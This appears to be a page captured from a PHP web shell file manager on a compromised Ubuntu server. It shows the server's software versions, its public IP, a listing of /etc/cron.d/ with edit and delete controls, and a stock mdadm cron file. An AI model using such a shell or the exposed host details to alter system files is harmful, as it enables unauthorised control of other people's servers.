NG4R3P
Linux backups 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
  SOFT : Apache/2.4.18 (Ubuntu) PHP : 7.2.34-8+ubuntu16.04.1+deb.sury.org+1
/etc/cron.d/
138.68.56.76

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
.placeholder 0.1 KB -rw-r--r-- 2016-04-05 18:59 R E G D
certbot 0.757 KB -rw-r--r-- 2019-02-09 22:39 R E G D
mdadm 0.575 KB -rw-r--r-- 2014-07-16 12:02 R E G D
php 0.695 KB -rw-r--r-- 2020-03-27 04:44 R E G D
popularity-contest 0.187 KB -rw-r--r-- 2018-03-06 05:15 R E G D
REQUEST EXIT
# # cron.d/mdadm -- schedules periodic redundancy checks of MD devices # # Copyright © martin f. krafft # distributed under the terms of the Artistic Licence 2.0 # # By default, run at 00:57 on every Sunday, but do nothing unless the day of # the month is less than or equal to 7. Thus, only run on the first Sunday of # each month. crontab(5) sucks, unfortunately, in this regard; therefore this # hack (see #380425). 57 0 * * 0 root if [ -x /usr/share/mdadm/checkarray ] && [ $(date +\%d) -le 7 ]; then /usr/share/mdadm/checkarray --cron --all --idle --quiet; fi